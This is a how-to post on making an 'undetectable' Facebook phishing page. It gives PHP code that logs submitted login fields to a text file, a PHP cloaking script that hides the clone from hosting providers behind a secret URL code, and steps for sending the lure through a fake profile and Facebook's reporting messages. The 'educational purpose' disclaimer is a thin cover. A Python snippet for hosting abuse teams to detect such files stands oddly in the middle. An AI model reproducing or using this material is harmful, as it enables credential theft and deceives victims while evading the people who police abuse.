How to make undetectable facebook phising

THIS IS FOR EDUCATIONAL PURPOSE ONLY.PLEASE DONT USE IT FOR WRONG PURPOSES PLEASE ITS A HUMBLE REQUEST TO YOU.


Warning & Disclaimer: Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, “How to create phishing page?”. If you use this to hack anyone account, then I AM not responsible for it. Do anything on your own risk. What is phishing page? A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In this, we just clone a site login or any other important page. How to create? Visit the facebook page that you want to clone(clone means to make phising website). Save it (CTRL+S) via your browser. Choose save complete webpage while saving it via browser. Give name index while saving. (Dont use other name!) 


Dont use other name! otherwise atlast facebook or other website will redirect the victim to reset the password saying that acoount hacked

Save it to a folder. Now, you should have one file named “index.htm” and a folder. We have to edit index.htm file. Edit it and search “action” without “”. You will get something like this if you are creating fake page of facebook, action=”https://www.facebook.com/login.php? login_attempt=1″ method=”post” , We have to edit this line only. Change https://www.facebook.com/login.php?login_attempt=1 to login.php (How to create login.php is written below) and change post to get , and save it. 

How to create login.php? Here is the code for login.php, just copy the below code, paste it in notepad and save it as login.php or you can download

 
Code: 
<?php header(“Location: http://www.google.com”); $handle = fopen(“passes.txt”, “a”); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle, $value); fwrite($handle, “rn”); } fwrite($handle, “rn”); fclose($handle); exit; ?> 

You have to change http://www.google.com to the site url that you are cloning, in the upper code or in downloaded file for example, change it to http://www.facebook.com/ if you are cloning facebook. Now, you have your phishing page. 

now we need to upload ALL this files to webhosting service refer to next article of mine or you can search in google for free web hosting service and upload these files in cpanels file manager

As web hosting service detects that its a phising website they will simply terminate the account so to save it do this thing

Host your phishing site without getting blocked

After i’v created the phishing page it’s got suspended within 5-6 hours. So it was a big challenge for me to host my phishing sites. But it was big a challenge until I’v learned some basics of php.

Here i will describe
I will describe how can you fool your hosting provides and host your phishing content to their server without getting suspended by them.

While Web Hosting providers attempts to find all phishing attempts from their servers, sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files.
This concept is to serve a different innocent looking web page instead of your phishing page when your hosting provider try to access your uploaded content.
but when you send the link to your phishing site to victim you will send the link with a unique identification number(through URL i will come to this later).
Then only your innocent looking uploaded file turn into a phishing page.
I have tried this with 2-3 free hosting providers and every time i succeeded.
In normal scenario when you design your phishing page and upload files to your hosting account,
your Web Hosting provider attempts to find all phishing attempts from their servers, Maximum time they do this by using automated crawlers. If the crawler find any Forbidden character in your uploaded files. Sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files and may suspend your account.

So how to bypass this??

Open any webpage you want to clone in your favorite browser.
Save the full page in .html.This step is almost common for every phishing attempt.
After saving the page you will get the page’s source code and also get a folder containing all the images and client side scripts.
I am assuming, you know how to configure the action field of the form/login page to configure a phishing page.
So after changing the action field what you have to do just rename the “html” page to “.jpg”
For example if you have “Login.html”. Just rename it to “Login.jpg”.
Now you have to choose any web page which will be served when your web hosting providers or anyone without having that unique identification number access the page.Do the same thing with that fake page also and rename it to “fake.jpg”
Create a new file called “phishing.php” and write following content into it.

<?php
$id = $_GET[“code”];
if ($id == “yourpasscode”) {
$myFile = “main.jpg”;
$fh = fopen($myFile, ‘r’);
$theData = fread($fh, 500000);
fclose($fh);
echo $theData;
}
else{
$myFile1 = “fake.jpg”;
$fh1 = fopen($myFile1, ‘r’);
$theData1 = fread($fh1, 500000);
fclose($fh1);
echo $theData1;
}
?>

In this code you just have to do following modification..
1>Change “yourpasscode” to your desired one.
2>Change “main.jpg” to the file name which one contain the real phishing web page’s code “Login.jpg”
3>Change “fake.jpg” to the file which file will contain the code of the fake page.

Now you have got the follwing files:
1)phishing.php (orginal phising page)
2)login.jpg
3)fake.jpg(fake page to be served if some one tried without the password earlier in this code it was “yourpasscode”)
4)A folder[Contains all the client side scripts and images for the real phishing page]

Now just upload all this to your hosting account.And try to access the
http://yoursite.com/phishing.php
with your browser.
Here you will get the fake page which is not actual login page.
Now try to access
http://yoursite.com/phishing.php?code=yourpasscode
your phishing page will open.
If you want to change the GET parameter “code” just modify the second line of the php script.
Now what will happen,when your hosting privder will test your content they will get a innocent php file reading another file.and when they try will to access “login.jpg” file they will get an invalid/corrupted image.
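How a hosting provider's abuse team can see through the renaming described above, as an added example that is not part of the original post: it checks whether files with image extensions really start with image magic bytes, and flags PHP scripts that combine a request parameter with a read of an image-named file. The function name `scan`, the finding labels and the sample files are assumptions constructed for illustration.

```python
import re

# Leading magic bytes a file with each image extension should start with.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
}
HTML_MARKUP = re.compile(rb"<\s*(html|form|input|script)\b", re.I)
PASSWORD_FIELD = re.compile(rb"type\s*=\s*[\"']?password", re.I)
REQUEST_PARAM = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\s*\[")
FILE_READ = re.compile(rb"\b(fopen|fread|readfile|file_get_contents|include|require)\b", re.I)
IMAGE_NAME = re.compile(rb"[\"'][^\"']*\.(jpe?g|png|gif)[\"']", re.I)

def scan(files):
    """files maps path -> bytes; returns path -> list of finding names."""
    findings = {}
    for path, data in files.items():
        ext = path[path.rfind("."):].lower() if "." in path else ""
        hits = []
        if ext in IMAGE_MAGIC and not data.startswith(IMAGE_MAGIC[ext]):
            hits.append("not-an-image")
            if HTML_MARKUP.search(data):
                hits.append("html-in-image-file")
            if PASSWORD_FIELD.search(data):
                hits.append("password-field-in-image-file")
        elif ext in (".php", ".phtml"):
            # Script reads a request parameter and reads a file named like an image:
            # the pattern of a gate that serves hidden markup only to some visitors.
            if all(p.search(data) for p in (REQUEST_PARAM, FILE_READ, IMAGE_NAME)):
                hits.append("request-gated-image-read")
        if hits:
            findings[path] = hits
    return findings

# Constructed sample upload (not taken from a real account).
SAMPLE = {
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32,
    "login.jpg": b"<html><form><input type='password' name='p'></form></html>",
    "hello.php": b"<?php echo 'hello'; ?>",
    # Truncated fragment, enough for the patterns to match.
    "gate.php": b"<?php $id = $_GET['code']; $f = 'main.jpg'; $fh = fopen($f, 'r');",
}

if __name__ == "__main__":
    for path, hits in scan(SAMPLE).items():
        print(path, hits)
```

Because the check reads file contents and not extensions, a "corrupted image" is itself the signal, and the script that reads it is flagged without ever requesting the page with the right parameter.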

now its time to send the message to the victim facebook inbox mind it that you cant send message in inbox if you are not friend of victim so to do that first create a fake facebook profile and open the victims facebook account an your fake facebook profile

then click select report this acoount after that select this timeline is using a fake name then click continue

then select message to resolve this erase the previous message and type your message this message will go in inbox of victim account
have a great day
